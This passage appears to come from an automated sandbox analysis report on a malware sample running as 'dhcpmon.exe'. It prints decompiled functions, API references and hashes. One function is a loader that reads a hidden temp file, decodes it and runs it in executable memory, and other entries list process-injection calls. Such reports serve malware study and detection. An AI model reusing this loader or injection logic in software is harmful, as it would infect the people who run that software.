								} else {
									_push(_t32);
									goto L14;
								}
							} else {
								_push(_t21);
								L14:
								E00403E03();
								L18:
								SetLastError(_t37);
							}
						} else {
							_t32 = E00405878(_t25, _t45, _t9);
							if(_t32 != 0) {
								L19:
								SetLastError(_t37);
								_t21 = _t32;
							} else {
								goto L12;
							}
						}
						return _t21;
					}
				} else {
					_t31 = E00405878(_t23, _t42, _t2);
					if(_t31 != 0) {
						L8:
						SetLastError(_t36);
						return _t31;
					} else {
						goto L2;
					}
				}
			}





















            0x00404320
            0x00404320
            0x00404320
            0x0040432a
            0x0040432c
            0x00404331
            0x00404334
            0x00404342
            0x00404349
            0x0040434e
            0x00404351
            0x00404354
            0x00404366
            0x0040436b
            0x0040436d
            0x00404378
            0x0040437f
            0x00404384
            0x00404387
            0x00404389
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x0040436f
            0x0040436f
            0x00000000
            0x0040436f
            0x00404356
            0x00404356
            0x00404357
            0x00404357
            0x0040435c
            0x00404397
            0x00404398
            0x0040439e
            0x004043a3
            0x004043a6
            0x004043a7
            0x004043a8
            0x004043af
            0x004043b1
            0x004043b3
            0x004043b8
            0x004043bb
            0x004043c9
            0x004043d5
            0x004043d8
            0x004043db
            0x004043ed
            0x004043f2
            0x004043f4
            0x004043ff
            0x00404405
            0x0040440d
            0x0040440f
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x004043f6
            0x004043f6
            0x00000000
            0x004043f6
            0x004043dd
            0x004043dd
            0x004043de
            0x004043de
            0x00404411
            0x00404412
            0x00404412
            0x004043bd
            0x004043c3
            0x004043c7
            0x0040441a
            0x0040441b
            0x00404421
            0x00000000
            0x00000000
            0x00000000
            0x004043c7
            0x00404428
            0x00404428
            0x00404336
            0x0040433c
            0x00404340
            0x0040438b
            0x0040438c
            0x00404396
            0x00000000
            0x00000000
            0x00000000
            0x00404340

            APIs
            • GetLastError.KERNEL32(?,?,004037D2,?,?,004016EA,00000000,?,00410E40), ref: 00404324
            • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 0040438C
            • SetLastError.KERNEL32(00000000,?,?,004016EA,00000000,?,00410E40), ref: 00404398
            • _abort.LIBCMT ref: 0040439E
            Memory Dump Source
            • Source File: 0000000B.00000001.663474041.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp Download File
            Yara matches
            Similarity
            • API ID: ErrorLast$_abort
            • String ID:
            • API String ID: 88804580-0
            • Opcode ID: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
            • Instruction ID: 10f1ed76ee289f7058500775698c1b2aead1ecf844b9f3100802fdeea25ad27f
            • Opcode Fuzzy Hash: 62ede4f37894db3567f5427a1490bbed1412223467fdb5f37ac402c07740c3c0
            • Instruction Fuzzy Hash: 75F0A976204701A6C21237769D0AB6B2A1ACBC1766F25423BFF18B22D1EF3CCD42859D
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004025BA, Relevance: 6.0, APIs: 4, Instructions: 14COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E004025BA() {
				void* _t4;
				void* _t8;

				E00402AE5();
				E00402A79();
				if(E004027D9() != 0) {
					_t4 = E0040278B(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00402815();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





            0x004025ba
            0x004025bf
            0x004025cb
            0x004025d0
            0x004025d5
            0x004025d7
            0x004025e2
            0x004025d9
            0x004025d9
            0x00000000
            0x004025d9
            0x004025cd
            0x004025cd
            0x004025cf
            0x004025cf

            APIs
            • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 004025BA
            • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 004025BF
            • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 004025C4
              • Part of subcall function 004027D9: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 004027EA
            • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 004025D9
            Memory Dump Source
            • Source File: 0000000B.00000001.663474041.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000B.00000001.663544913.0000000000414000.00000040.00020000.sdmp Download File
            Yara matches
            Similarity
            • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
            • String ID:
            • API String ID: 1761009282-0
            • Opcode ID: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
            • Instruction ID: 4128bea016199bb2a2d03f508bec19fe8aa18f4adc422371eefe93b2158e2da6
            • Opcode Fuzzy Hash: 25f408f13cbe0c40dd9f497db491c4efe3e5092114ef2f2bbff8929357b925fc
            • Instruction Fuzzy Hash: E0C0024414014264DC6036B32F2E5AA235409A63CDBD458BBA951776C3ADFD044A553E
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00402E79, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 115COMMON
            Download Yara Rule
            C-Code - Quality: 87%
            			E00402E79(intOrPtr _a4) {
				signed int _v8;
				void* _v12;
				char _v16;
				intOrPtr* _t35;
				struct HINSTANCE__* _t36;
				struct HINSTANCE__* _t42;
				intOrPtr* _t43;
				intOrPtr* _t44;
				WCHAR* _t48;
				struct HINSTANCE__* _t49;
				struct HINSTANCE__* _t53;
				intOrPtr* _t56;
				struct HINSTANCE__* _t61;
				intOrPtr _t62;

				if(_a4 == 2 || _a4 == 1) {
					GetModuleFileNameW(0, 0x412bf8, 0x104);
					_t48 =  *0x412e7c; // 0x6c1c14
					 *0x412e80 = 0x412bf8;
					if(_t48 == 0 ||  *_t48 == 0) {
						_t48 = 0x412bf8;
					}
					_v8 = 0;
					_v16 = 0;
					E00402F98(_t48, 0, 0,  &_v8,  &_v16);
					_t61 = E0040311E(_v8, _v16, 2);
					if(_t61 != 0) {
						E00402F98(_t48, _t61, _t61 + _v8 * 4,  &_v8,  &_v16);
						if(_a4 != 1) {
							_v12 = 0;
							_push( &_v12);
							_t49 = E00404D5E(_t61);
							if(_t49 == 0) {
								_t56 = _v12;
								_t53 = 0;
								_t35 = _t56;
								if( *_t56 == 0) {
									L15:
									_t36 = 0;
									 *0x412e6c = _t53;
									_v12 = 0;
									_t49 = 0;
									 *0x412e74 = _t56;
									L16:
									E00403E03(_t36);
									_v12 = 0;
									goto L17;
								} else {
									goto L14;
								}
								do {
									L14:
									_t35 = _t35 + 4;
									_t53 =  &(_t53->i);
								} while ( *_t35 != 0);
								goto L15;
							}
							_t36 = _v12;
							goto L16;
						}
						 *0x412e6c = _v8 - 1;
						_t42 = _t61;
						_t61 = 0;
						 *0x412e74 = _t42;
						goto L10;
					} else {
						_t43 = E00404831();
						_push(0xc);
						_pop(0);
						 *_t43 = 0;
						L10:
						_t49 = 0;
						L17:
						E00403E03(_t61);
						return _t49;
					}
				} else {
					_t44 = E00404831();
					_t62 = 0x16;
					 *_t44 = _t62;
					E00404639();
					return _t62;
				}
			}

















            0x00402e86
            0x00402eb4
            0x00402eba
            0x00402ec0
            0x00402ec8
            0x00402ecf
            0x00402ecf
            0x00402ed4
            0x00402edb
            0x00402ee2
            0x00402ef4
            0x00402efb
            0x00402f1a
            0x00402f26
            0x00402f41
            0x00402f44
            0x00402f4b
            0x00402f51
            0x00402f58
            0x00402f5b
            0x00402f5d
            0x00402f61
            0x00402f6b
            0x00402f6b
            0x00402f6d
            0x00402f73
            0x00402f76
            0x00402f78
            0x00402f7e
            0x00402f7f
            0x00402f85
            0x00000000
            0x00000000
            0x00000000
            0x00000000
            0x00402f63
            0x00402f63
            0x00402f63
            0x00402f66
            0x00402f67
            0x00000000
            0x00402f63
            0x00402f53
            0x00000000
            0x00402f53
            0x00402f2c
            0x00402f31
            0x00402f33
            0x00402f35
            0x00000000
            0x00402efd
            0x00402efd
            0x00402f02
            0x00402f04
            0x00402f05
            0x00402f3a
            0x00402f3a
            0x00402f88
            0x00402f89
            0x00000000
            0x00402f92
            0x00402e8e
            0x00402e8e
            0x00402e95
            0x00402e96
            0x00402e98
            0x00000000
            0x00402e9d

            APIs
            • GetModuleFileNameW.KERNEL32(00000000,C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe,00000104), ref: 00402EB4
            Strings
            Memory Dump Source
            • Source File: 0000000B.00000002.683128059.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: FileModuleName
            • String ID: C:\Program Files (x86)\DHCP Monitor\dhcpmon.exe$Nl
            • API String ID: 514040917-1399274662
            • Opcode ID: d65f86be848b3adfa8fae1fc2f580f18a902642f457ef4245597d21aeb7a866c
            • Instruction ID: f3d78f03607b51ffb72bb6c03706454bab976d361db7ab759f67f4c6569d847e
            • Opcode Fuzzy Hash: d65f86be848b3adfa8fae1fc2f580f18a902642f457ef4245597d21aeb7a866c
            • Instruction Fuzzy Hash: 9631C471A00219AFCB21DF99DA8899FBBBCEF84744B10407BF804A72C0D6F44E41DB98
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00405575, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00405575() {

				 *0x412e78 = GetCommandLineA();
				 *0x412e7c = GetCommandLineW();
				return 1;
			}



            0x0040557b
            0x00405586
            0x0040558d

            APIs
            Strings
            Memory Dump Source
            • Source File: 0000000B.00000002.683128059.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
            Yara matches
            Similarity
            • API ID: CommandLine
            • String ID: @3l
            • API String ID: 3253501508-1068768401
            • Opcode ID: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
            • Instruction ID: 265b5206e6e9c5440433cfe38bbdb56a7b23962a2c49d0f47ff6119da82ef27c
            • Opcode Fuzzy Hash: 5876c0817ba34097e06c4a717b2c5bc39c627040ca7456eb6673a9cffb0a1105
            • Instruction Fuzzy Hash: 24B09278800300CFD7008FB0BB8C0843BA0B2382023A09175D511D2320D6F40060DF4C
            Uniqueness

            Uniqueness Score: -1.00%

            Analysis Process: dhcpmon.exe PID: 6724 Parent PID: 3424 dhcpmon.exeCOMMON

            Executed Functions

            Function 6F651000, Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 85filememorystringCOMMON
            Download Yara Rule
            C-Code - Quality: 82%
            			E6F651000() {
				long _v8;
				short _v528;
				long _t12;
				void* _t16;
				signed char _t23;
				void* _t35;
				long _t38;

				_v8 = 0;
				if(IsDebuggerPresent() != 0) {
					DebugBreak();
				}
				_t12 = GetTempPathW(0x103,  &_v528);
				if(_t12 != 0) {
					lstrcatW( &_v528, L"\\ks446tcfy17w7jqy3r");
					_t16 = CreateFileW( &_v528, 0x80000000, 7, 0, 3, 0x80, 0); // executed
					_t35 = _t16;
					if(_t35 == 0xffffffff) {
						L12:
						return _t16;
					}
					_t16 = GetFileSize(_t35, 0);
					_t38 = _t16;
					if(_t38 == 0xffffffff) {
						L11:
						goto L12;
					}
					_t16 = VirtualAlloc(0, _t38, 0x3000, 0x40); // executed
					 *0x6f653000 = _t16;
					if(_t16 == 0) {
						goto L11;
					}
					_t16 = ReadFile(_t35, _t16, _t38,  &_v8, 0); // executed
					if(_t16 == 0) {
						goto L11;
					}
					_t23 = 0;
					if(_v8 <= 0) {
						L10:
						_t16 =  *0x6f653000(); // executed
						goto L11;
					}
					do {
						asm("rol cl, 0x2");
						 *((char*)( *0x6f653000 + _t23)) = (0x00000082 - (( !( *((intOrPtr*)( *0x6f653000 + _t23)) + 0x00000003 ^ 0x0000006a) ^ 0x000000e1) - _t23 ^ _t23) ^ 0x00000068) - 1 + _t23;
						_t23 = _t23 + 1;
					} while (_t23 < _v8);
					goto L10;
				}
				return _t12;
			}










            0x6f651009
            0x6f651018
            0x6f65101a
            0x6f65101a
            0x6f65102c
            0x6f651034
            0x6f651047
            0x6f651066
            0x6f65106c
            0x6f651071
            0x6f6510f6
            0x00000000
            0x6f6510f6
            0x6f65107b
            0x6f651081
            0x6f651086
            0x6f6510f5
            0x00000000
            0x6f6510f5
            0x6f651092
            0x6f651098
            0x6f65109f
            0x00000000
            0x00000000
            0x6f6510aa
            0x6f6510b2
            0x00000000
            0x00000000
            0x6f6510b5
            0x6f6510ba
            0x6f6510ee
            0x6f6510ee
            0x00000000
            0x6f6510f4
            0x6f6510c0
            0x6f6510d3
            0x6f6510e5
            0x6f6510e8
            0x6f6510e9
            0x00000000
            0x6f6510c0
            0x6f6510fa

            APIs
            • IsDebuggerPresent.KERNEL32 ref: 6F651010
            • DebugBreak.KERNEL32 ref: 6F65101A
            • GetTempPathW.KERNEL32(00000103,?), ref: 6F65102C
            • lstrcatW.KERNEL32(?,\ks446tcfy17w7jqy3r), ref: 6F651047
            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 6F651066
            • GetFileSize.KERNEL32(00000000,00000000), ref: 6F65107B
            • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 6F651092
            • ReadFile.KERNELBASE(00000000,00000000,00000000,00000000,00000000), ref: 6F6510AA
            Strings
            Memory Dump Source
            • Source File: 0000000C.00000002.691360334.000000006F651000.00000020.00020000.sdmp, Offset: 6F650000, based on PE: true
            • Associated: 0000000C.00000002.691346421.000000006F650000.00000002.00020000.sdmp Download File
            • Associated: 0000000C.00000002.691368165.000000006F652000.00000002.00020000.sdmp Download File
            • Associated: 0000000C.00000002.691379692.000000006F654000.00000002.00020000.sdmp Download File
            Similarity
            • API ID: File$AllocBreakCreateDebugDebuggerPathPresentReadSizeTempVirtuallstrcat
            • String ID: \ks446tcfy17w7jqy3r
            • API String ID: 4020703165-2035310939
            • Opcode ID: dd4c89e591819437fcf5559a26250c590023ac43ad2499852a8c103f25272dd5
            • Instruction ID: 3b34cf203370b5f81187a3aff94fd812445fd89867d48bc79f73e720d95b5f53
            • Opcode Fuzzy Hash: dd4c89e591819437fcf5559a26250c590023ac43ad2499852a8c103f25272dd5
            • Instruction Fuzzy Hash: 2D21F431602711ABEB209F728C5EFEB7B68EB06760F104251E664B20C0DF74613DCA60
            Uniqueness

            Uniqueness Score: -1.00%

            Function 02B711EB, Relevance: 12.6, APIs: 6, Strings: 1, Instructions: 350memoryfileCOMMON
            Download Yara Rule
            APIs
            • VirtualAlloc.KERNELBASE(00000000,1C200000,00003000,00000004,?,050A26AF,00000000), ref: 02B71520
            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 02B7157F
            Strings
            Memory Dump Source
            • Source File: 0000000C.00000002.691286346.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false
            Similarity
            • API ID: AllocCreateFileVirtual
            • String ID: b1a2f4be1bb040dfae4382b4765a8fb2
            • API String ID: 1475775534-2543734446
            • Opcode ID: 3e9eb696310382312a471573b98bb606ff28a96822e7d8fdb3900a6b8a597b0b
            • Instruction ID: b4885d5e8b9c8f04be96f631fff0ba8cb53f6257eb35da08595e99f2eff5818f
            • Opcode Fuzzy Hash: 3e9eb696310382312a471573b98bb606ff28a96822e7d8fdb3900a6b8a597b0b
            • Instruction Fuzzy Hash: 9AE15A30E54388EDEB21CBE4DC05BEDBBB5AF05710F1044DAE608FA191D7B50A84DB26
            Uniqueness

            Uniqueness Score: -1.00%

            Function 02B70719, Relevance: 10.7, APIs: 7, Instructions: 237fileCOMMON
            Download Yara Rule
            APIs
            • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,00000000,55E38B1F,00000000,050A26AF,00000000,D6EB2188,00000000,433A3842), ref: 02B7081B
            • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?), ref: 02B709E8
            Memory Dump Source
            • Source File: 0000000C.00000002.691286346.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false
            Similarity
            • API ID: CreateFileFreeVirtual
            • String ID:
            • API String ID: 204039940-0
            • Opcode ID: f7d36a05684a882bf25a7b393b28ed484d6d346c480faf729b79359556833635
            • Instruction ID: 0108102181a05154a0902a57ad8e83a29952ab707e69f2cf73dae93d3d111377
            • Opcode Fuzzy Hash: f7d36a05684a882bf25a7b393b28ed484d6d346c480faf729b79359556833635
            • Instruction Fuzzy Hash: E0A1F374E10249EFEF10DFE8C845BADBBB1EF18315F20489AE625BA290D3755A40DF10
            Uniqueness

            Uniqueness Score: -1.00%

            Function 02B70034, Relevance: 6.6, APIs: 4, Instructions: 558processthreadCOMMON
            Download Yara Rule
            APIs
            • CreateProcessW.KERNELBASE(?,00000000), ref: 02B70387
            • GetThreadContext.KERNELBASE(?,00010007), ref: 02B703AA
            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 02B703CE
            Memory Dump Source
            • Source File: 0000000C.00000002.691286346.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false
            Similarity
            • API ID: Process$ContextCreateMemoryReadThread
            • String ID:
            • API String ID: 2411489757-0
            • Opcode ID: ce7313b6f1d382a46a3a27bf89398752bdb55ce968a71c998840cff26e162291
            • Instruction ID: b1f509be9725177fdb7c8972df35d61fbe7ac052b3d0b54156570193b128eb39
            • Opcode Fuzzy Hash: ce7313b6f1d382a46a3a27bf89398752bdb55ce968a71c998840cff26e162291
            • Instruction Fuzzy Hash: 9C322671E50218EFEB20DBA4DC55BADB7B5FF48704F20449AE618FA2A0D7709A80DF15
            Uniqueness

            Uniqueness Score: -1.00%

            Non-executed Functions

            Analysis Process: dhcpmon.exe PID: 6704 Parent PID: 6724 dhcpmon.exeCOMMON

            Executed Functions

            Function 00401E1D, Relevance: 1.5, APIs: 1, Instructions: 3COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00401E1D() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00401E29); // executed
				return _t1;
			}




            0x00401e22
            0x00401e28

            APIs
            • SetUnhandledExceptionFilter.KERNELBASE(Function_00001E29,00401716), ref: 00401E22
            Memory Dump Source
            • Source File: 0000000D.00000001.685271018.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp Download File
            Yara matches
            Similarity
            • API ID: ExceptionFilterUnhandled
            • String ID:
            • API String ID: 3192549508-0
            • Opcode ID: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
            • Instruction ID: 98c1414349b9c6d47e2858da2eafac41ced4a749a9169aad70cadcfed52b35c5
            • Opcode Fuzzy Hash: f10ce909f55bf21439a7486d1ee2c3bdf37a7dd0004178b465455f206acc9e88
            • Instruction Fuzzy Hash:
            Uniqueness

            Uniqueness Score: -1.00%

            Function 00401489, Relevance: 17.5, APIs: 9, Strings: 1, Instructions: 43COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E00401489() {
				void* _v8;
				struct HRSRC__* _t4;
				long _t10;
				struct HRSRC__* _t12;
				void* _t16;

				_t4 = FindResourceW(GetModuleHandleW(0), 1, 0xa); // executed
				_t12 = _t4;
				if(_t12 == 0) {
					L6:
					ExitProcess(0);
				}
				_t16 = LoadResource(GetModuleHandleW(0), _t12);
				if(_t16 != 0) {
					_v8 = LockResource(_t16);
					_t10 = SizeofResource(GetModuleHandleW(0), _t12);
					_t13 = _v8;
					if(_v8 != 0 && _t10 != 0) {
						L00401000(_t13, _t10); // executed
					}
				}
				FreeResource(_t16);
				goto L6;
			}








            0x0040149f
            0x004014a5
            0x004014a9
            0x004014ec
            0x004014ee
            0x004014ee
            0x004014b7
            0x004014bb
            0x004014c7
            0x004014cd
            0x004014d3
            0x004014d8
            0x004014e0
            0x004014e0
            0x004014d8
            0x004014e6
            0x00000000

            APIs
            • GetModuleHandleW.KERNEL32(00000000,00000001,0000000A,00000000,?,00000000,?,?,80004003), ref: 0040149C
            • FindResourceW.KERNELBASE(00000000,?,?,80004003), ref: 0040149F
            • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014AE
            • LoadResource.KERNEL32(00000000,?,?,80004003), ref: 004014B1
            • LockResource.KERNEL32(00000000,?,?,80004003), ref: 004014BE
            • GetModuleHandleW.KERNEL32(00000000,00000000,?,?,80004003), ref: 004014CA
            • SizeofResource.KERNEL32(00000000,?,?,80004003), ref: 004014CD
              • Part of subcall function 00401489: CLRCreateInstance.MSCOREE(00410A70,00410A30,?), ref: 00401037
            • FreeResource.KERNEL32(00000000,?,?,80004003), ref: 004014E6
            • ExitProcess.KERNEL32 ref: 004014EE
            Strings
            Memory Dump Source
            • Source File: 0000000D.00000001.685271018.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp Download File
            Yara matches
            Similarity
            • API ID: Resource$HandleModule$CreateExitFindFreeInstanceLoadLockProcessSizeof
            • String ID: v4.0.30319
            • API String ID: 2372384083-3152434051
            • Opcode ID: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
            • Instruction ID: e1ffc0a1c1a4d9c60ba63a2b3d6c0bb581dd470f6d51773805e4de56b79455e5
            • Opcode Fuzzy Hash: 060aa7053acf556b93056d40afe3d2a4a8ddd9aae74d8bebeb0beeb8417ee5ee
            • Instruction Fuzzy Hash: C6F03C74A01304EBE6306BE18ECDF1B7A9CAF84789F050134FA01B62A0DA748C00C679
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0499B6C0, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 124threadCOMMON
            Download Yara Rule
            APIs
            • GetCurrentProcess.KERNEL32 ref: 0499B730
            • GetCurrentThread.KERNEL32 ref: 0499B76D
            • GetCurrentProcess.KERNEL32 ref: 0499B7AA
            • GetCurrentThreadId.KERNEL32 ref: 0499B803
            Strings
            Memory Dump Source
            • Source File: 0000000D.00000002.704458828.0000000004990000.00000040.00000001.sdmp, Offset: 04990000, based on PE: false
            Similarity
            • API ID: Current$ProcessThread
            • String ID: 0io
            • API String ID: 2063062207-2987954341
            • Opcode ID: 716a7f10fe31fc5324675b4a419c45c82fdd78cb8cd0a10488ae866d1bc0ca59
            • Instruction ID: 53e6a7ae245349bf2d762bc42bcc17fb255ffdbfd556d2d43d3b8f55def8d7d4
            • Opcode Fuzzy Hash: 716a7f10fe31fc5324675b4a419c45c82fdd78cb8cd0a10488ae866d1bc0ca59
            • Instruction Fuzzy Hash: B45158B49043488FEB10CFA9D588BDEBBF1FF48314F24856AD459A7790C778A844CB66
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0499B6D0, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 120threadCOMMON
            Download Yara Rule
            APIs
            • GetCurrentProcess.KERNEL32 ref: 0499B730
            • GetCurrentThread.KERNEL32 ref: 0499B76D
            • GetCurrentProcess.KERNEL32 ref: 0499B7AA
            • GetCurrentThreadId.KERNEL32 ref: 0499B803
            Strings
            Memory Dump Source
            • Source File: 0000000D.00000002.704458828.0000000004990000.00000040.00000001.sdmp, Offset: 04990000, based on PE: false
            Similarity
            • API ID: Current$ProcessThread
            • String ID: 0io
            • API String ID: 2063062207-2987954341
            • Opcode ID: 3517b243e14fa6154568e32ec7c1b70d2fbf3f0e23b31403e7b18ee3a8e81624
            • Instruction ID: 912ea04427f2970b98dc1c800b87e0f0e43eb910b25c4d103d99eccb44e066b9
            • Opcode Fuzzy Hash: 3517b243e14fa6154568e32ec7c1b70d2fbf3f0e23b31403e7b18ee3a8e81624
            • Instruction Fuzzy Hash: A15147B09043488FEB10CFA9D588BDEBBF5FF88314F248569E419A7750D774A844CBA6
            Uniqueness

            Uniqueness Score: -1.00%

            Function 04997EE9, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 55COMMON
            Download Yara Rule
            APIs
            • KiUserCallbackDispatcher.NTDLL(0000004B), ref: 04997F5D
            Strings
            Memory Dump Source
            • Source File: 0000000D.00000002.704458828.0000000004990000.00000040.00000001.sdmp, Offset: 04990000, based on PE: false
            Similarity
            • API ID: CallbackDispatcherUser
            • String ID: 0io
            • API String ID: 2492992576-2987954341
            • Opcode ID: 20de9eb85d542b70500b346a0c6022cdb15e13fcc14484dd105f827ebb7f05aa
            • Instruction ID: a0d0e96f15409742398090faf2fa2f28b987a2a2696eff7750ddfdc7473df3b9
            • Opcode Fuzzy Hash: 20de9eb85d542b70500b346a0c6022cdb15e13fcc14484dd105f827ebb7f05aa
            • Instruction Fuzzy Hash: E5119D74809398CEDB10CFA9D4443DAFFF4AB05314F54846EE89477242C778A659CBA5
            Uniqueness

            Uniqueness Score: -1.00%

            Function 004055C5, Relevance: 3.0, APIs: 2, Instructions: 37COMMON
            Download Yara Rule
            C-Code - Quality: 100%
            			E004055C5(void* __ecx) {
				void* _t6;
				void* _t14;
				void* _t18;
				WCHAR* _t19;

				_t14 = __ecx;
				_t19 = GetEnvironmentStringsW();
				if(_t19 != 0) {
					_t12 = (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1);
					_t6 = E00403E3D(_t14, (E0040558E(_t19) - _t19 >> 1) + (E0040558E(_t19) - _t19 >> 1)); // executed
					_t18 = _t6;
					if(_t18 != 0) {
						E0040ACF0(_t18, _t19, _t12);
					}
					E00403E03(0);
					FreeEnvironmentStringsW(_t19);
				} else {
					_t18 = 0;
				}
				return _t18;
			}







            0x004055c5
            0x004055cf
            0x004055d3
            0x004055e4
            0x004055e8
            0x004055ed
            0x004055f3
            0x004055f8
            0x004055fd
            0x00405602
            0x00405609
            0x004055d5
            0x004055d5
            0x004055d5
            0x00405614

            APIs
            • GetEnvironmentStringsW.KERNEL32 ref: 004055C9
            • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00405609
            Memory Dump Source
            • Source File: 0000000D.00000001.685271018.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
            • Associated: 0000000D.00000001.685346299.0000000000414000.00000040.00020000.sdmp Download File
            Yara matches
            Similarity
            • API ID: EnvironmentStrings$Free
            • String ID:
            • API String ID: 3328510275-0
            • Opcode ID: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
            • Instruction ID: c5c85d496f4b9afafe33008ffa5735024e7f647e2ae8fec8aafe46d04be69a25
            • Opcode Fuzzy Hash: 8cd0ade3987da643afe372fdbc3b04457b893c98baeb1de225cc927f8a7ffae8
            • Instruction Fuzzy Hash: E7E0E5371049206BD22127267C8AA6B2A1DCFC17B5765063BF809B61C2AE3D8E0208FD
            Uniqueness

            Uniqueness Score: -1.00%

            Function 051C17E0, Relevance: 2.0, APIs: 1, Instructions: 517COMMON
            Download Yara Rule
            Memory Dump Source
            • Source File: 0000000D.00000002.704719396.00000000051C0000.00000040.00000001.sdmp, Offset: 051C0000, based on PE: false
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: 5c659abb1658d7960febb10d98b923917397a9ac9d7f11bd240d373cca7d3c4e
            • Instruction ID: 19acb7890d01f1e3cd3501d1b170b09c2dbab64c4307bef6a54ff77c26036e7e
            • Opcode Fuzzy Hash: 5c659abb1658d7960febb10d98b923917397a9ac9d7f11bd240d373cca7d3c4e
            • Instruction Fuzzy Hash: F122A378E44205CFDB14CB94D488ABEBFB2FFA9310F15819AD46267355C736E881CB51
            Uniqueness

            Uniqueness Score: -1.00%

            Function 049993E8, Relevance: 1.7, APIs: 1, Instructions: 194COMMON
            Download Yara Rule
            APIs
            • GetModuleHandleW.KERNELBASE(00000000), ref: 0499962E
            Memory Dump Source
            • Source File: 0000000D.00000002.704458828.0000000004990000.00000040.00000001.sdmp, Offset: 04990000, based on PE: false
            Similarity
            • API ID: HandleModule
            • String ID:
            • API String ID: 4139908857-0
            • Opcode ID: 75602968e5962d0115b248fce5bab78f970ee1b6577af7aa3b87ce3172071349
            • Instruction ID: 16e2e69b5a5f8efe9264a10143ac0f7f21791864bc113530d17c8077d0d52b6e
            • Opcode Fuzzy Hash: 75602968e5962d0115b248fce5bab78f970ee1b6577af7aa3b87ce3172071349
            • Instruction Fuzzy Hash: 3C7103B0A00B158FDB64DF6AD05175ABBF6BF88204F008A2ED58AD7B40D735F845CB91
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0499FBEE, Relevance: 1.6, APIs: 1, Instructions: 114COMMON
            Download Yara Rule
            APIs
            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0499FD0A
            Memory Dump Source
            • Source File: 0000000D.00000002.704458828.0000000004990000.00000040.00000001.sdmp, Offset: 04990000, based on PE: false
            Similarity
            • API ID: CreateWindow
            • String ID:
            • API String ID: 716092398-0
            • Opcode ID: 2e8f757c696e6f8e1f3abca7f4bf6276d92ad884efd54653d8b4dc699a27c1a0
            • Instruction ID: d6a2e551340e51b45ce326343609c1552f8e6b8db9b1bd6c056b0f9f89a82aa2
            • Opcode Fuzzy Hash: 2e8f757c696e6f8e1f3abca7f4bf6276d92ad884efd54653d8b4dc699a27c1a0
            • Instruction Fuzzy Hash: 3B51AFB5D002499FDF14CFA9C884ADDFBB5BF48314F24812AE819AB214D774A945CF90
            Uniqueness

            Uniqueness Score: -1.00%

            Function 0499FBF8, Relevance: 1.6, APIs: 1, Instructions: 113COMMON
            Download Yara Rule
            APIs
            • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 0499FD0A
            Memory Dump Source
